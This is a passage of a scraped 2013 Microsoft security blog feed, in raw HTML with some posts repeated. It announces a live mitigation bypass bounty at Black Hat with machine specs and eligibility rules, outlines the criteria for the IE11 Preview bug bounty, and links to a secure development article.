demonstrated it.) The specifications for the machines at the booth on Wednesday and Thursday are as follows:</span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">The Specs<br /></span></span></strong><span style="font-family: Calibri; font-size: small;">The machine: </span><a href="http://shop.lenovo.com/us/en/laptops/thinkpad/x-series/x1-carbon/index.html#techspecs"><span style="color: #0563c1; font-family: Calibri; font-size: small;">Lenovo ThinkPad X1 Carbon Touch</span></a><br /><span style="font-family: Calibri; font-size: small;"> The host OS: Windows 8 (x64)<br /> The guest OS: Windows 8.1 Preview (x64)<br /> &nbsp; - Using default settings<br /> &nbsp; - Using local account <br /> Guest RAM: 4GB<br /> Guest processors: 4<br /> Guest networked via dedicated Network Interface Card</span></p> <p>&nbsp;</p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">The Live Bounty Experience<br /></span></span></strong><span style="font-size: small;"><span style="font-family: Calibri;">If you&rsquo;re planning to try your hand at getting $100,000 from Microsoft, show up at the booth a little before lunchtime on the day of your choosing. <strong>We recommend coming by 12:30 PM, since the lunch hour starts at 12:45 PM.</strong>&nbsp; </span></span></p> <p><span style="font-family: Calibri; font-size: small;">Bring your exploit (with source code) and a copy (electronic or print, as you prefer) of the white paper detailing the new exploit technique, as described in </span><a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">the guidelines</span></a><span style="font-size: small;"><span style="font-family: Calibri;">. We&rsquo;ll walk you through some basic qualifying questions listed in the guidelines -- things like making sure you don&rsquo;t live in a country that is subject to US trade embargoes, and that you don&rsquo;t work for Microsoft (or live with or are a close family member of someone who works here).&nbsp; As long as you&rsquo;re over the ripe old age of 14 and have met all compliance requirement outlined in the guidelines, we&rsquo;ll let you have a go at the $100,000 bounty. Minors should bring a parent or legal guardian to sign all the paperwork and accept the money on their behalf.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Two of our judges will be on hand as you demonstrate your bypass technique to the cheering throngs. If you&rsquo;re successful at the live demo portion of the event, you and the judges will be whisked away to de-brief in the private Judging Suite upstairs, where they&rsquo;ll examine your work more closely and ask any relevant questions while you enjoy a well-earned break from the chaos. (It is possible we&rsquo;ll be tweeting with excitement at this point, just because.) They will review your whitepaper as well in the suite, and the final qualification will come AFTER the judges have a chance to discuss the bypass privately with you.&nbsp; </span></span></p> <p><span style="font-family: Calibri; font-size: small;">Once the bypass and your eligibility are fully confirmed, we&rsquo;ll tweet out confirmation (from </span><a href="http://twitter.com/k8em0"><span style="color: #0563c1; font-family: Calibri; font-size: small;">@k8em0</span></a><span style="font-family: Calibri; font-size: small;"> and </span><a href="http://twitter.com/msftsecresponse"><span style="color: #0563c1; font-family: Calibri; font-size: small;">@msftsecresponse</span></a><span style="font-size: small;"><span style="font-family: Calibri;">) to a breathlessly waiting world. The press will be eager to meet you, and our customers will be grateful that you decided to use your intellect for the greater good of helping to protect over a billion computers worldwide.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">As far as qualifying for the BlueHat Bonus for Defense (up to an extra $50,000 for a defensive idea to go with your new exploitation technique), we&rsquo;d gladly accept the whitepaper from you that describes that idea. We won&rsquo;t be doing live qualifications for that portion in Vegas, however, since we&rsquo;d need to judge those submissions against a range of factors such as application compatibility, among others, in order to determine a bounty there.&nbsp; If we do get a qualifying defensive submission as part of your entry &ndash; we&rsquo;ll notify you of the good news via secure [at] Microsoft [dot] com as soon as we can.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Happy hunting --</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Katie Moussouris<br /></span></span><span style="font-size: small;"><span style="font-family: Calibri;">Senior Security Strategist, MSRC<br /></span></span><a href="http://twitter.com/k8em0"><span style="color: #0563c1; font-family: Calibri; font-size: small;">http://twitter.com/k8em0</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> (that&rsquo;s a zero)</span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3586679&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">bountyprogramsSecurity EcosystemSecurity Conference EngagementBountyBlack Hat Preparing for Live Pwnage: Mitigation Bypass Bounty Machine Specs for Black Hathttp://blogs.technet.com/b/bluehat/archive/2013/07/24/preparing-for-live-pwnage-mitigation-bypass-bounty-machine-specs-for-black-hat.aspxWed, 24 Jul 2013 21:39:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:f5471a59-559d-4493-91b7-d48076764326BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3586679http://blogs.technet.com/b/bluehat/archive/2013/07/24/preparing-for-live-pwnage-mitigation-bypass-bounty-machine-specs-for-black-hat.aspx#comments<p><span style="font-size: small;"><span style="font-family: Calibri;">With about one week to go before we all gather at Black Hat in Las Vegas, we&rsquo;re getting inquiries about precisely how the promised Live Mitigation Bypass Bounty judging at Black Hat will work. For most of the world, it works best when you get a good spot at the Microsoft booth (#301) around noon each day, so you can clearly see the excitement as some of security&rsquo;s best and brightest look to pop built-in Windows 8.1 preview mitigations in truly novel ways. Will one or more talented folk qualify for the $100,000 bounty on new exploitation techniques? We&rsquo;re as eager to find out as you are.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Perhaps <em>you</em> intend to be the first person EVER to qualify for the largest ongoing bounty for new attack techniques offered by any company so far. In that case, allow us to tell you more about the machine you&rsquo;re looking to win. (In addition to $100,000, we&rsquo;ll give anyone able to demonstrate a truly novel mitigation bypass the very computer on which they&rsquo;ve demonstrated it.) The specifications for the machines at the booth on Wednesday and Thursday are as follows:</span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">The Specs<br /></span></span></strong><span style="font-family: Calibri; font-size: small;">The machine: </span><a href="http://shop.lenovo.com/us/en/laptops/thinkpad/x-series/x1-carbon/index.html#techspecs"><span style="color: #0563c1; font-family: Calibri; font-size: small;">Lenovo ThinkPad X1 Carbon Touch</span></a><br /><span style="font-family: Calibri; font-size: small;"> The host OS: Windows 8 (x64)<br /> The guest OS: Windows 8.1 Preview (x64)<br /> &nbsp; - Using default settings<br /> &nbsp; - Using local account <br /> Guest RAM: 4GB<br /> Guest processors: 4<br /> Guest networked via dedicated Network Interface Card</span></p> <p>&nbsp;</p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">The Live Bounty Experience<br /></span></span></strong><span style="font-size: small;"><span style="font-family: Calibri;">If you&rsquo;re planning to try your hand at getting $100,000 from Microsoft, show up at the booth a little before lunchtime on the day of your choosing. <strong>We recommend coming by 12:30 PM, since the lunch hour starts at 12:45 PM.</strong>&nbsp; </span></span></p> <p><span style="font-family: Calibri; font-size: small;">Bring your exploit (with source code) and a copy (electronic or print, as you prefer) of the white paper detailing the new exploit technique, as described in </span><a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">the guidelines</span></a><span style="font-size: small;"><span style="font-family: Calibri;">. We&rsquo;ll walk you through some basic qualifying questions listed in the guidelines -- things like making sure you don&rsquo;t live in a country that is subject to US trade embargoes, and that you don&rsquo;t work for Microsoft (or live with or are a close family member of someone who works here).&nbsp; As long as you&rsquo;re over the ripe old age of 14 and have met all compliance requirement outlined in the guidelines, we&rsquo;ll let you have a go at the $100,000 bounty. Minors should bring a parent or legal guardian to sign all the paperwork and accept the money on their behalf.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Two of our judges will be on hand as you demonstrate your bypass technique to the cheering throngs. If you&rsquo;re successful at the live demo portion of the event, you and the judges will be whisked away to de-brief in the private Judging Suite upstairs, where they&rsquo;ll examine your work more closely and ask any relevant questions while you enjoy a well-earned break from the chaos. (It is possible we&rsquo;ll be tweeting with excitement at this point, just because.) They will review your whitepaper as well in the suite, and the final qualification will come AFTER the judges have a chance to discuss the bypass privately with you.&nbsp; </span></span></p> <p><span style="font-family: Calibri; font-size: small;">Once the bypass and your eligibility are fully confirmed, we&rsquo;ll tweet out confirmation (from </span><a href="http://twitter.com/k8em0"><span style="color: #0563c1; font-family: Calibri; font-size: small;">@k8em0</span></a><span style="font-family: Calibri; font-size: small;"> and </span><a href="http://twitter.com/msftsecresponse"><span style="color: #0563c1; font-family: Calibri; font-size: small;">@msftsecresponse</span></a><span style="font-size: small;"><span style="font-family: Calibri;">) to a breathlessly waiting world. The press will be eager to meet you, and our customers will be grateful that you decided to use your intellect for the greater good of helping to protect over a billion computers worldwide.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">As far as qualifying for the BlueHat Bonus for Defense (up to an extra $50,000 for a defensive idea to go with your new exploitation technique), we&rsquo;d gladly accept the whitepaper from you that describes that idea. We won&rsquo;t be doing live qualifications for that portion in Vegas, however, since we&rsquo;d need to judge those submissions against a range of factors such as application compatibility, among others, in order to determine a bounty there.&nbsp; If we do get a qualifying defensive submission as part of your entry &ndash; we&rsquo;ll notify you of the good news via secure [at] Microsoft [dot] com as soon as we can.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Happy hunting --</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Katie Moussouris<br /></span></span><span style="font-size: small;"><span style="font-family: Calibri;">Senior Security Strategist, MSRC<br /></span></span><a href="http://twitter.com/k8em0"><span style="color: #0563c1; font-family: Calibri; font-size: small;">http://twitter.com/k8em0</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> (that&rsquo;s a zero)</span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3586679&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">bountyprogramsSecurity EcosystemSecurity Conference EngagementBountyBlack Hat Secure Development Is Much Easier Than You Thinkhttp://blogs.msdn.com/b/sdl/archive/2013/07/24/secure-development-is-much-easier-than-you-think.aspxWed, 24 Jul 2013 17:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10436288SDL Team0http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10436288http://blogs.msdn.com/b/sdl/archive/2013/07/24/secure-development-is-much-easier-than-you-think.aspx#comments<p><span style="font-family: 'Calibri','sans-serif'; font-size: 10.5pt;">Secure software development is something we believe is absolutely critical to helping create safer more trusted computing experiences for everyone.&nbsp; So much so that we invest in providing free tools, resources and guidance to help assist organizations in adopting an SDL process and are actively involved in helping to evangelize these resources to the security community. However while these resources have existed since 2008, our </span><span style="font-family: 'Calibri','sans-serif';"><a title="http://blogs.technet.com/b/security/archive/2013/07/12/trust-in-computing-survey-part-2-less-than-half-of-developers-use-a-security-development-process.aspx" href="http://blogs.technet.com/b/security/archive/2013/07/12/trust-in-computing-survey-part-2-less-than-half-of-developers-use-a-security-development-process.aspx" target="_parent"><span style="font-size: 10.5pt;">Trust in Computing study</span></a></span><span style="font-family: 'Calibri','sans-serif'; font-size: 10.5pt;"> showed that adoption still remains low predominately due to perceived cost, lack of support and training.&nbsp;&nbsp; </span></p> <p><span style="font-family: 'Calibri','sans-serif'; font-size: 10.5pt;">With that in mind, we believe it&rsquo;s important to help educate developers on just how easy it is to implement.&nbsp;&nbsp; We recently worked with Dr Dobb&rsquo;s on an article to help raise awareness of several simple development and testing techniques that can help automate secure coding for Windows and Linux apps. If you are building apps or an SDL program, or consider doing so, I strongly encourage you to check it out:</span></p> <p><span style="font-family: arial,helvetica,sans-serif; font-size: medium;"><span style="color: #000000;"><span style="color: black; font-family: 'Arial','sans-serif'; font-size: 9pt; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;">Link: </span><span style="font-family: 'Calibri','sans-serif'; font-size: 11pt; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;"><a title="http://www.drdobbs.com/security/secure-development-is-much-easier-than-y/240158709" href="http://www.drdobbs.com/security/secure-development-is-much-easier-than-y/240158709" target="_parent"><span style="font-family: 'Arial','sans-serif'; font-size: 9pt;">Secure Development Is Much Easier Than You Think</span></a></span></span></span></p> <p>Arjuna</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10436288" width="1" height="1">SDLSecurity ToolsSecurity Development Lifecycle Attention Bounty Hunters – The Ramp Up to Black Hathttp://blogs.technet.com/b/bluehat/archive/2013/07/17/attention-bounty-hunters-the-ramp-up-to-black-hat.aspxWed, 17 Jul 2013 15:57:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:4639b891-6563-42ca-ae53-dbe65ac5226aBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3585422http://blogs.technet.com/b/bluehat/archive/2013/07/17/attention-bounty-hunters-the-ramp-up-to-black-hat.aspx#comments<p><span style="font-size: small;"><span style="font-family: Calibri;">We&rsquo;re three weeks into our new world of bounties for Microsoft products now, and as the clock ticks down on one program, we&rsquo;re prepping for some live excitement with one of the others.</span></span></p> <p><span style="font-family: Calibri;"><span style="font-size: small;">First, the Internet Explorer 11 Preview Bounty is entering its final 10 days; the bounty period for that program closes on the 26</span><sup><span style="font-size: x-small;">th</span></sup><span style="font-size: small;"> of July. We&rsquo;ll gladly accept submissions of vulnerabilities found after that, but the bug bounty for individual IE vulnerabilities will be over. The two platform-wide bounty programs will continue to be available and ready to pay out up to $100,000 for a truly novel exploitation technique, and up to a $50,000 bonus for defense.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">So far, we&rsquo;ve received many submissions and were able to notify the first bounty recipient last week. We have several more that have qualified for bounties and we're excited to see so many great submissions.&nbsp; &nbsp;Other finders are in the process of being notified via secure [at] microsoft [dot] com. After the close of the bounty period, we&rsquo;ll post an acknowledgement page saluting all those finders who wish to be publicly identified. Meanwhile, our triage team is bracing for a last rush of vulnerability submissions as we approach the final days of the IE-specific bounty program; we&rsquo;re keeping them fed and hydrated as best we can.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">For those of you interested in examples of what the judges are looking for when it comes to awarding the bounties, here they are, from the judges themselves. To qualify for the highest bounties, we look at the severity of the issue, as well as the overall quality of the submission to determine the bounty amount.</span></span></p> <p style="padding-left: 30px;"><span style="font-size: small;"><span style="font-family: Calibri;"><strong>Memory Corruption:</strong> Most memory corruption vulnerabilities that are found in Internet Explorer have the potential to enable remote code execution and therefore are likely to qualify for the $1,100 bounty. &nbsp;For example, the memory corruption vulnerabilities that were addressed in </span></span><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-055"><span style="color: #0563c1; font-family: Calibri; font-size: small;">MS13-055</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> represent the types of vulnerabilities that would qualify (e.g. CVE-2013-3115).&nbsp; </span></span></p> <p style="padding-left: 30px;"><span style="font-size: small;"><span style="font-family: Calibri;">To qualify for the $11,000 bounty, we must receive a submission that proves that a vulnerability is exploitable for remote code execution. This means the submission must include a functioning exploit that is able to bypass all relevant mitigations and run arbitrary code (such as executing calc.exe). In addition, the submission must include a whitepaper that describes the root cause of the vulnerability.<strong> If the technique used to exploit the vulnerability is truly novel, then we would award the $100,000 Mitigation Bypass Bounty in addition to the $11,000 IE 11 Preview Bug Bounty. </strong></span></span></p> <p style="padding-left: 30px;"><span style="font-size: small;"><span style="font-family: Calibri;"><strong>Design Issues:</strong> We&rsquo;ve been receiving a lot of submissions that, while extremely clever in their own right, do not meet the bar as an &ldquo;Important or higher severity design-level vulnerability.&rdquo;&nbsp; In order to qualify for a design-level bounty, an issue will need to match up to what we&rsquo;ve historically ranked at these levels.&nbsp; Execution of arbitrary code qualifies, of course, but in the design-level space these issues aren&rsquo;t as common.&nbsp; </span></span></p> <p style="padding-left: 30px;"><span style="font-family: Calibri; font-size: small;">More common are the Important-severity information disclosure bugs we tend to call &ldquo;Cross Domain,&rdquo; or in modern industry parlance, &ldquo;Universal XSS&rdquo; or &ldquo;Same Origin Policy Bypass&rdquo; bugs.&nbsp; These are issues where a malicious page can, generally without caveat, reach out into a different security context and grab information it should not have access to. A good example would be CVE-2008-2947, fixed in </span><a href="http://technet.microsoft.com/en-us/security/bulletin/MS08-058"><span style="color: #0563c1; font-family: Calibri; font-size: small;">MS08-058</span></a><span style="font-size: small;"><span style="font-family: Calibri;">.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Of course, one place to seek some of the best and brightest security researchers at the end of July is in Las Vegas, at Black Hat &ndash; and what better place for the spectacle of live pwnage? That&rsquo;s why on 31 July and 1 August, at around noon each day, we&rsquo;ll be judging live mitigation bypass attempts at the Microsoft booth. Even if you don&rsquo;t have a new exploitation technique to try out yourself, stop by for what I call the &ldquo;exploit art walk&rdquo; &ndash; because those who have the skills to bypass the latest platform defenses are true artists, and a rare breed. </span></span></p> <p><span style="font-family: Calibri; font-size: small;">If you think you&rsquo;ve got what it takes, show up at the booth &ndash; we&rsquo;ll have the </span><a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">guidelines</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> posted, or you can read them at that link &ndash; or reach out to me via Twitter to let us know your plans.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">What happens in Vegas could earn you $100,000.&nbsp; See you there.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Katie Moussouris<br /></span></span><span style="font-size: small;"><span style="font-family: Calibri;">Senior Security Strategist, MSRC<br /></span></span><a href="http://twitter.com/k8em0"><span style="color: #0563c1; font-family: Calibri; font-size: small;">http://twitter.com/k8em0</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> (that&rsquo;s a zero)</span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3585422&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">bountyprogramsZero-Day ExploitBlueHat PrizeSecurity ResearchBounty Attention Bounty Hunters – The Ramp Up to Black Hathttp://blogs.technet.com/b/bluehat/archive/2013/07/17/attention-bounty-hunters-the-ramp-up-to-black-hat.aspxWed, 17 Jul 2013 15:57:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:4639b891-6563-42ca-ae53-dbe65ac5226aBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3585422http://blogs.technet.com/b/bluehat/archive/2013/07/17/attention-bounty-hunters-the-ramp-up-to-black-hat.aspx#comments<p><span style="font-size: small;"><span style="font-family: Calibri;">We&rsquo;re three weeks into our new world of bounties for Microsoft products now, and as the clock ticks down on one program, we&rsquo;re prepping for some live excitement with one of the others.</span></span></p> <p><span style="font-family: Calibri;"><span style="font-size: small;">First, the Internet Explorer 11 Preview Bounty is entering its final 10 days; the bounty period for that program closes on the 26</span><sup><span style="font-size: x-small;">th</span></sup><span style="font-size: small;"> of July. We&rsquo;ll gladly accept submissions of vulnerabilities found after that, but the bug bounty for individual IE vulnerabilities will be over. The two platform-wide bounty programs will continue to be available and ready to pay out up to $100,000 for a truly novel exploitation technique, and up to a $50,000 bonus for defense.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">So far, we&rsquo;ve received many submissions and were able to notify the first bounty recipient last week. We have several more that have qualified for bounties and we're excited to see so many great submissions.&nbsp; &nbsp;Other finders are in the process of being notified via secure [at] microsoft [dot] com. After the close of the bounty period, we&rsquo;ll post an acknowledgement page saluting all those finders who wish to be publicly identified. Meanwhile, our triage team is bracing for a last rush of vulnerability submissions as we approach the final days of the IE-specific bounty program; we&rsquo;re keeping them fed and hydrated as best we can.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">For those of you interested in examples of what the judges are looking for when it comes to awarding the bounties, here they are, from the judges themselves. To qualify for the highest bounties, we look at the severity of the issue, as well as the overall quality of the submission to determine the bounty amount.</span></span></p> <p style="padding-left: 30px;"><span style="font-size: small;"><span style="font-family: Calibri;"><strong>Memory Corruption:</strong> Most memory corruption vulnerabilities that are found in Internet Explorer have the potential to enable remote code execution and therefore are likely to qualify for the $1,100 bounty. &nbsp;For example, the memory corruption vulnerabilities that were addressed in </span></span><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-055"><span style="color: #0563c1; font-family: Calibri; font-size: small;">MS13-055</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> represent the types of vulnerabilities that would qualify (e.g. CVE-2013-3115).&nbsp; </span></span></p> <p style="padding-left: 30p